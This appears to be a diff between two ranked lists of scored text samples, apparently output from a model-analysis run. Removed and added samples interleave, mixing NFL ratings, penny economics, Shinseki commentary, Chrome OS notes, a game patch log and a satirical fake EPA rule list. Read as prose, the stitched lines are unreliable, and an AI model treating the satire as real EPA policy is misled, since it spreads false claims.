><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +He also complained to Ipso, which ruled that the phrase “Islamic honour killing” suggested that “the killing had been motivated by Islam, when there was no basis for saying that religion had played a role in this killing”. + +The Express corrected a headline claiming religious groups could ban the new £5 note because the Bank of England could not promise they were halal. The new version read: “New £5 could be BANNED by religious ================================================================================ -Rank = 78; Score = 4112384.0 -<|begin_of_text|>Yes, Eric Shin­seki had to go, and he prob­ably knew it him­self once the hor­ror stor­ies sur­faced. As the re­tired four-star gen­er­al learned at West Point, the com­mand­er is ul­ti­mately re­spons­ible. While the Vet­er­ans Ad­min­is­tra­tion has been a ma­na­geri­al bleed­ing sore for years, the chaos and per­haps crimin­al­ity at sub­or­din­ate ech­el­ons of the VA on Shin­seki’s watch made his sur­viv­al im­possible. +Rank = 78; Score = 2260992.0 +<|begin_of_text|>The ongoing political protests surrounding some players' decision to take a knee during the national anthem didn't help the NFL's "Sunday Night Football" ratings. -But let’s not for­get that Ric Shin­seki is not just a highly dec­or­ated com­mand­er and wounded war­ri­or, los­ing part of his foot in Vi­et­nam and claw­ing his way back onto act­ive duty against the wishes of Army brass. He’s a truth-tell­er of the first rank — and that dis­play of char­ac­ter so en­raged the George W. Bush de­fense team that he en­countered some of the shab­bi­est treat­ment an of­ficer and a gen­tle­man has ever en­countered dur­ing my 46 years serving in and hanging around the Pentagon. +Viewership for the primetime game between the Washington Redskins and the Oakland Raiders was down on NBC by 11 percent from the same night one year ago and 9 percent from the previous week, according to The Hollywood Reporter. The media outlet reports the game averaged an 11.6 household rating. Fox saw a 16 percent decrease in ratings for the NFL afternoon game, according to Forbes. -It didn’t help his case with the Bush­ies that Bill Clin­ton had ap­poin­ted him Army chief of staff. Moreover, De­fense Sec­ret­ary Don­ald Rums­feld, who didn’t en­joy be­ing chal­lenged, quickly took a dis­like to Shin­seki after sev­er­al policy and strategy dis­agree­ments. +However, ratings for CBS were up 4 percent from last year's Week 3 coverage, according to a CBS Sports press release. -Rummy was so in­tent on pun­ish­ing Shin­seki out, in fact, that he dir­ec­ted one of his flack-shop aco­lytes to leak word of his re­place­ment to The New York Times — 15 months be­fore Shin­seki’s four-year term was up. +The less-than-stellar ratings came after President Trump slammed the NFL during a rally in Alabama on Friday, saying players who protest the national anthem should be fired. -This had the in­stant ef­fect of ren­der­ing Shin­seki a lame duck with­in the E-ring, the Pentagon’s power cor­ridor. It was cheesy, petty, shame­ful, -================================================================================ -Rank = 79; Score = 4112384.0 -<|begin_of_text|>Following news last week that EPA had allowed for the re-introduction of asbestos into the construction market, architects across the country have lambasted the proposal, calling for a blanket ban on asbestos. In response, the environmental agency has issued the following statement: +Possibly taking away viewers from NBC's "SNF" WAS CBS' 50th anniversary season premiere of "60 Minutes" with Oprah Winfrey and the only broadcast of the new "Star Trek Discovery." -“The EPA accepts the blanket ban on asbestos and will under no circumstances permit the production of asbestos blankets, but other asbestos products may be used where there is significant desire to do so because after all, asbestos is the best osTM #MAGA.” +These were top markets for "Sunday Night Football," according to Deadline: -In addition to this statement, the EPA released a full list of materials granted SNUR (Significant New Use Rule) status following a year-long safety inquiry. The document can be seen below. +1. D.C.- 23.3/40 -ENVIRONMENTAL PROTECTION AGENCY +2. Richmond – 22.1/33 -NOTIFICATION OF SIGNIFICANT NEW USE RULES FOR PROHIBITED MATERIALS: +3. Norfolk – 19.8/31 -Structural Cheese: With asbestos back on the menu, so is cheese. Once again, certain cheeses will be classified as safe for construction. Any cheese harder than an average supermarket cheddar will once again be permitted for use in structural members for public and governmental buildings no larger than a soccer stadium. Many of these cheeses have been consistently described as ‘robust’, ‘extra strong’ and ‘particularly tangy’ and so are clearly suitable for supporting extremely heavy loads. For obvious reasons, mozzarella is banned for construction use in pizza shops and all cheese is banned from mice farms. The EPA would like to clarify that this cheese legislation has nothing to do with the 1.4 billion-pound surplus of cheese in the U.S. +4. Sacramento – 17.5/32 -Napkin Tiling: To combat the wasteful practice of discarding unused restaurant-grade napkins, the EPA will classify them as suitable for tiling bathrooms and wet-rooms. The famous slogan “one sheet does plenty” clearly applies to the use of napkins as bathroom tiles, and they are marketed as “super-absorbent” so are perfect for use in areas that tend to get excessively wet. They are also often folded into the shape of boats, or swans, so are clearly waterproof. Napkins with scribbles and doodles on them will not be permitted. +5. S.F./Oakland – 17.2/35 -Chocolate Fire Doors: In order to drastically cut deforestation in North America the EPA proposes to drastically increase deforestation in South America. This can be done by doubling chocolate production in South American countries. This surplus chocolate will be used in the construction of fire-rated door sets. In the event of a fire, conventional timber doors catch fire, and fire is well known to be the leading cause of fire. Chocolate +6. New Orleans – 17.2/24 + +7. Denver – 16.2/27 + +8. Buffalo- 15.4/24 + +9. Kansas City – 14.8/24 + +10. Las Vegas – 14.5/23<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 80; Score = 4096000.0 -<|begin_of_text|>Riley Reiff’s Future With Detroit Depends On What Quinn Does In The Coming Months. +Rank = 79; Score = 2228224.0 +<|begin_of_text|>The U.S. One Cent coin, or penny, has almost no purchasing power today. The cost of making the pennies (1.66 cents each) is higher than face value, and the melt value of pennies ranges from more than two cents for the pre-1982 copper pennies, to nearly a full cent for the copper plated zinc pennies. However, the penny is a very sentimental coin to most Americans, and many people fear that eliminating the penny would raise prices because things would need to be rounded up to the nearest nickel. -The biggest possible free agent in Detroit in 2017 is Riley Reiff. He is a key part to the offensive line and losing him would be a big blow. If Detroit can bring back Reiff, then they can find a better backup in the free agency or the NFL Draft. If Reiff leaves though, Detroit may need to look for a starter than a backup. Reiff is the most important free agent and the sooner we have a decision on what he will do, the sooner we can figure out what to do with others. +Both sides in the penny debate make some good points, and the solution is far from being an easy decision. This article takes a look at the issues involved in the pro-penny and the anti-penny debate so that you can make up your mind about where you stand on this critical matter. -Riley Reiff +Background -Reiff started 14 games and did well moving over to right tackle with Taylor Decker coming in to take over the left tackle spot. Reiff only allowed four sacks and got called for three penalties this season. Reiff is one of the best right tackles in the free agent class, so he could ask for a high price, but offensive tackle is an important position for this team, so paying him more than what he is worth may be what Detroit has to do to keep him. +The United States has eliminated a small denomination coin in the past with relatively little trouble. In 1857, the Mint stopped making the half-cent coin, partly because the cost of making it had exceeded its face value, and somewhat because it was considered to be too small a denomination that it was no longer needed. -Decision: Stay +Back in 1857, the half-cent had the purchasing power that would translate to well over ten cents today, so in some ways, it was akin to our eliminating the dime. Commerce continued without any major hiccups, even though the one-cent copper coin suddenly shrunk from a hefty, over an inch in diameter piece of copper that weighed almost 11 grams, to a penny that was less than half the weight and 40% smaller. -Taylor Decker +Other significant changes in U.S. coinage occurred without any catastrophic effects on commerce. In 1965 the U.S. Mint stopped making 90% silver dimes, quarters, and half dollars and changed them over to base metal clad versions. The outer shell was made out of 75% copper and 25% nickel bonded to a core of pure copper. A few people groused about it, but commerce continued unabated. -Decker had a fantastic rookie year in the league. He started in all 17 games and only allowed four and a half sacks this year. He struggled with penalties, getting six called on him, but that isn’t shocking from a rookie. Decker has been what this team needed at the position. Getting rid of those penalty issues and Decker can be a long-term left tackle in Detroit. +There have been several other minor changes in the coin metal composition. These composition changes ranged from temporary wartime alterations during World War II, to more permanent switches like using zinc instead of copper for the penny. More recently, the mint changed the cupro-nickel clad dollar coin (the Susan B. Anthony) to the "golden dollar" type used in the Sacagawea and Presidential Dollar types. None of these changes caused any significant problems in commerce. -Decision: Stay +Many foreign nations have +================================================================================ +Rank = 80; Score = 2228224.0 +<|begin_of_text|>Less than 24 hours after Minneapolis voters finished hacking through a 35-candidate ballot, the Charter Commission voted unanimously to raise the entry fee from $20 to $500, matching St. Paul's. + +The lower fee, in place for at least 40 years -- according to commissioner Lyall Schwarzkopf, who remembered it from when he was city clerk in 1972 -- had enabled candidates, in the absence of a primary, to make "a mockery" of recent mayoral elections, said Commissioner Devin Rice. -Corey Robinson +"We shouldn't overreact, but 35 candidates was ridiculous," said Commisisoner Jan Sandberg. "We absolutely have to do something about that filing fee." -Robinson started three games this year and did well in Reiff’s spot when he was out. Robinson got called for one flag and allowed only one sack. Robinson was a former seventh round pick and many questioned if he would make the team this year. Those three games he proved to be a solid backup and getting rid of him isn’t what Detroit wants to do. +The $20 fee is set by a state law which allows cities to adopt higher fees. The $20 fee applied to only four cities: Minneapolis, St. Paul, Duluth and Rochester. St. Paul had put a $50 fee in place, then raised that to $500 in 2010. Rochester's fee went from $25 to $50 in 1988. Duluth's? Still $20. -Decision: Stay +The new Minneapolis fees are intended to be entered into the overhauled city charter that voters overwhelmingly approved Tuesday. The revised charter takes effect in 2015. But first they have to go before the City Council, which can change them and send them back to the charter commission for another vote before they're entered into the charter. Commission chairman Barry CLegg said that if the council refuses to act, the proposal will go directly to voters in 2014. He said he'd expect overwhelming support. -Cornelius Lucas +Rice first proposed raising the mayoral filing fee to $300, pointing out that he didn't want to judge the seriousness of any candidate, but did want to make sure that they filed campaign finance reports, which a $100 expenditure triggers. He also said he didn't think it should cost more to file for mayor than it does for U.S. Senate ($500) and governor ($400). -Lucas only appeared in five games this year and while he didn’t draw any flags, he allowed a sack. Now he didn’t start like Robinson, but Lucas isn’t a good backup here in Detroit. He is like a traffic cone at times and people just get around him so quickly, I was surprised he made the team this season. His performance this season could have been the final straw as he was the worst offensive tackle on the team. +But the rest of the board upped the ante, also raising the fee to enter a city council race from $20 to $250, and the fee to run for Park and Recreation Board and the Board of Estimate and Taxation from $20 to $100. -Decision: Go +"$500 today is not a barrier," said Commissioner Todd Ferrara. -Possible Offensive Tackle Replacements +Twenty dollars in 1972 would be worth $111.70 today. -Now +Candidate Bob "Again" Carney agreed that Tuesday's ballot was "cumbersome." He said the higher filing fee might have ================================================================================ -Rank = 81; Score = 4079616.0 -<|begin_of_text|>The Stable channel has been updated to 28.0.1500.68 for all Chrome OS devices (Platform version: 4100.68.0 for all devices except Cr-48, which was updated to 4100.78.0). This build contains a number of feature enhancements, bug fixes and security improvements. Machines will be receiving updates over the next several days. +Rank = 81; Score = 2228224.0 +<|begin_of_text|>The NBA's newest Canadian players aren't just looking forward to joining their pro teams. -Release Highlights: +Nik Stauskas and Tyler Ennis are envisioning the day when they all get together wearing Canada's national team jersey. -Numerous crash fixes and performance improvements. +"I think, once we get in the gym together, getting chemistry and just get all the talent in one gym for the first time, I think that will be a big moment for Canada," Ennis said Thursday night at the NBA draft. "I think not only 2016, but the following Olympics I think we'll be able to make a run at it." -Speed improvements for the Files app, along with support for files that are Shared with me and Recent on Google Drive. +Story continues below advertisement -Monitor Rotation and Scaling - you can scale your UI smaller and rotate the screen on all Chromebooks. +Stauskas, a long-range shooter from Mississauga, Ont., went eighth overall to the Sacramento Kings in Thursday night's draft at Barclays Center. Ennis, a point guard from Brampton, Ont., went 18th to the Phoenix Suns. -Notification pop-up message appears when screenshots are taken. Clicking on the notification will bring you right to the screenshot. +Andrew Wiggins, a 19-year-old sensation from Vaughan, Ont., was taken No. 1 overall by the Cleveland Cavaliers. -Replaced the Japanese IME with a NaCl extension version downloads a better language model upon actual usage. +The Canadians were asked in their post-draft interviews if they think Canada can give perennial powerhouse United States a run for their money at the 2016 Rio Olympics. -Added transliteration IMEs for Indic languages from Google Input Tools. +"I talked with Andrew (Wiggins) the last couple of days, just being here in New York at the same time. We're very excited for the future of Canada basketball," Stauskas said. "I feel like, if we really all commit to coming in and working hard and coming together, I think we could have a really good team. -Touch link highlighting on Chromebook Pixel - we now provide feedback on which link you click or button you press. +"I'm not saying we're going to win a gold medal right now, but I'm saying that we could have a chance to compete at that level if we really — if we all commit to it. -Updated Chrome Office Viewer (Beta) extension +Dwight Powell of Toronto was the fourth Canadian drafted Thursday, going 45th overall to the Charlotte Hornets. -Pepper Flash updated to 11.8.800.94 +The first-round picks confirm Canada will have at least 12 players on NBA rosters next season — second most in the league behind the United States. Canada passed France, which previously held that honour with nine players on NBA rosters. -Known issues: +Story continues below advertisement -On Acer C7 Chromebooks, docked mode has been disabled when connecting to an external monitor. +Story continues below advertisement -I f you find new issues, please let us know by visiting our help site or filing a bug. Interested in switching channels? Find out how. You can submit feedback using ‘Report an issue...’ in the Chrome menu (3 horizontal bars in the upper right corner of the browser). +"It's such a tremendous night for Canadian Basketball. For Andrew, Nik and Tyler to go in the top 18 in such an incredibly deep draft makes such a compelling case for the development of the Canadian game," said Wayne Parrish, Canada Basketball's president and CEO. -Danielle Drew +Canada's men's basketball team hasn't played in the Olympics since Steve Nash led the squad to a seventh-place finish at the 2000 Olympics. -Google Chrome<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +The ================================================================================ -Rank = 82; Score = 4046848.0 -<|begin_of_text|>Thanks for visiting, why don't you come back? Follow me on Twitter and get blog updates by e-mail: subscribe here +Rank = 82; Score = 2211840.0 +<|begin_of_text|>First they said the downing of Russian Metrojet Flight 9268 was most likely due to Russia’s “notorious” regional airlines, which supposedly are rickety and unreliable. The Egyptian government denied that terrorism is even a possibility, with Egyptian despot Abdel Fatah al-Sisi proclaiming: -Our extinction crisis continues; 2013 allowed us to safely conclude that we will never again see the animals listed below ( Our extinction crisis continues; 2013 allowed us to safely conclude that we will never again see the animals listed below ( 2012 version here ). +“When there is propaganda that it crashed because of Isis, this is one way to damage the stability and security of Egypt and the image of Egypt. Believe me, the situation in Sinai – especially in this limited area – is under our full control.” -One of the last known photos of +However, it soon came out that the person in charge of Sharm el-Sheikh airport, where the Russia plane had landed before taking off again, had been “replaced” – oh, but not because of anything to do with the downing of the Russian passenger plane! As the Egyptian authorities put it: -a Formosan Clouded Leopard; +“Adel Mahgoub, chairman of the state company that runs Egypt’s civilian airports, says airport chief Abdel-Wahab Ali has been ‘promoted’ to become his assistant. He said the move late Wednesday had nothing to do with media skepticism surrounding the airport’s security. Mahgoub said Ali is being replaced by Emad el-Balasi, a pilot.” -taken by Torii Ryūzō. +Laughable, albeit in a sinister way, and yet more evidence that something wasn’t quite right: after all, everyone knows the Egyptian government does not have the Sinai, over which the plane disintegrated in mid air, under its “full control.” ISIS, which claimed responsibility for the crash hours after it occurred, is all over that peninsula. -The Formosan Clouded Leopard (Neofelis nebulosa +Still, the denials poured in, mostly from US government officials such as Director of National Intelligence James “Liar-liar-pants-on-fire” Clapper, who said ISIS involvement was “unlikely.” Then they told us it couldn’t have been ISIS because they supposedly don’t have surface-to-air missiles that can reach the height attained by the downed plane. Yet that wasn’t very convincing either, because a) How do they know what ISIS has in its arsenal?, and b) couldn’t ISIS or some other group have smuggled a bomb on board? -brachyura +The better part of a week after the crash, we have this: -) of Taiwan +“Days after authorities dismissed claims that ISIS brought down a Russian passenger jet, a U.S. intelligence analysis now suggests that the terror group or its affiliates planted a bomb on the plane. -. None have been seen in over thirty years, despite a recent and intensive 13-year effort to document one. We did just about everything we could to eliminate this animal; we destroyed their habitat, killed them for their skins, and got rid of the other animals they normally ate. They didn't have a chance. +“British Foreign Minister Philip Hammond said his government believes there is a ‘significant possibility’ that an explosive device caused the crash. And +================================================================================ +Rank = 83; Score = 2195456.0 +<|begin_of_text|>Version 0.10.2 -Chioninia coctei), which hasn't been seen since 1912, The Cape Verde Giant Skink (), which hasn't been seen since 1912, has been declared extinct, although a jawbone from one of these lizards was found in some cat scat in 2005. However, since then the cat +Content: -(i.e., house cat) +Added a new Intelligence Skill - Incinerate: Launches a torrent of fire from your hand. The longer you repeatedly cast the spell from the same location, the larger and more damaging the flames become. -population has increased substantially and, aided by rats and dogs, has likely wiped out the skink. +Added a new cosmetic microtransaction effect - Blue Flame Incinerate: Replaces the standard flame of Incinerate with a ghostly blue fire. -Macrognathus pentophthalmos) The Sri Lanka Spiny Eel ( is probably extinct. As recently as 1980 the species was considered common but it was likely done in by a non-native species of fish that ate many of them. +Added a new cosmetic microtransaction effect - Tiki Totem: Replaces the standard Spell Totem or Ranged Attack Totem with a coloured totem that has carved tiki designs. -The Eskimo Curlew (Numenius borealis) was once so abundant that the sizes of its flocks were compared to those of Passenger Pigeons. They now have something else in common. The last known Eskimo Curlew was observed in 1963; Canada is likely to decide it is officially extinct because it has been 50 years since one has been seen. Eskimo Curlews probably suffered from a decline in their locust prey as well as loss of habitat but the primary cause of extinction is thought to be overhunting. Indeed, the last known Eskimo Curlew was shot by a hunter in Barbados. +Added four new Unique items, three of which were designed by our Diamond Supporters. -The Southern Darwin's Frog +Added a new flamethrower ability to Snakes in the Dark Forest. -(i.e., not the extinct one); +Monster packs in end-game Map areas have had their size variance increased. -by Mono Andes, Wikimedia. +The Solaris/Lunaris Temple tilesets have been improved and should now have higher performance. -This year, scientists concluded that the Northern Darwin's +Added a new 3v3 PvP arena. One of the other arenas has been disabled temporarily while we fix a problem. -Frog ( +Improved blood effects. -Rhinoderma rufum -================================================================================ -Rank = 83; Score = 4046848.0 -<|begin_of_text|>For Immediate Release +Improved the Ice Spear and Lightning Arrow effects. -Note similarities to previous administration +Improved the performance of Ground Ice and Ground Tar. -Top 10 disasters of the 2009 Obama administration (in no particular order): +Improved the gem icons to be slightly better from a colour blindness point of view. -1. Cash for Clunkers +Continued to incrementally improve the art, effects and environments. -2. War escalation in Afghanistan +Features: -3. Giant government health care expansion bill +The passive skill tree now requires confirmation before changes are applied. This prevents accidental misclicks. If you want to skip this confirmation, ctrl+click the passive and no window will be displayed. -4. Post office loses money hand over fist +We've added a "Lost Password" button to the main menu. -5. Stimulus package +Pressing Ctrl+up in chat allows you to cycle through previous players you've talked to via whisper in this session. -6. Expansion of “state secrets” doctrine +Chat messages that are more than one line long now indent subsequent lines so that it's harder to confuse other players with fake messages. -7. Big increase in unemployment +There's now a /clear_ignore_list command that will remove all entries from the list of accounts you are ignoring chat messages from. Better management of ignore lists is coming in the future. -8. “Bailout” Geithner as Treasury Secretary +Players in an area are now always granted the quest status of having killed a boss regardless of who killed it. -9. Skyrocketing federal spending +The performance statistics overlay (F1) can now be bound to other keys. -10. Huge federal deficits +Audio Changes: -Top 10 disasters of the 2001-2008 Bush administration: +Added PvP announcer audio for various events in matches. -1. Cash for Car Companies +Added personalised introductions for Nessa. -2. War in Iraq +Added a few more Nessa greetings. -3. Giant Medicare expansion bill +Added new Tarkleigh greetings. -4. Post office loses money hand over fist +Added some improved Marauder combat vocals. -5. Stimulus “rebate” checks +Added improved Marauder comment dialogue. -6. PATRIOT Act +Added new ranger dialogue and improved some existing ones. -7. Big increase in unemployment +Overhauled the audio of +================================================================================ +Rank = 84; Score = 2162688.0 +<|begin_of_text|>The Associated Press -8. “Bailout” Paulson as Treasury Secretary +NEW YORK - O No, Canada. -9. Skyrocketing federal spending +A Broadway performer botched the Canadian national anthem before the Toronto Raptors' game in Brooklyn on Sunday, singing lyrics that aren't in "O Canada." -10. Huge federal deficits +Amber Iman, who has been cast in the national tour of "Hamilton" that will soon open, sang, "O Canada, we sing our hearts for thee." The line that ends the song is "O Canada, we stand on guard for thee." -Wes Benedict, Libertarian Party Executive Director, commented, “Republicans and Democrats keep expanding government and creating more and more problems. We’re encouraging as many Libertarians as possible to run for Congress in 2010. In Texas, the state with the earliest filing deadline, Libertarians have already filed for 31 of 32 Congressional seats.” +Raptors players and coaches looked around in confusion as they stood in line. -For more information, or to arrange an interview, call LP executive director Wes Benedict at 202-333-0008 ext. 222. +"I'm going to leave that alone. But yeah, that anthem was a lot different than I've heard over the last five years. A lot different," Raptors All-Star Kyle Lowry said. "Her voice was beautiful, but the anthem, the song, the words... have her come to Toronto, we'll come and get somebody to give her some lessons." -The LP is America’s third-largest political party, founded in 1971. The Libertarian Party stands for free markets and civil liberties. You can find more information on the Libertarian Party at our website. +The Raptors responded by poking fun at the Nets on Twitter, writing "For future reference" and posting the correct lyrics to the song. -###<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +The Nets apologized to the singer for the prompter failing according to a spokeswoman at the Barclays 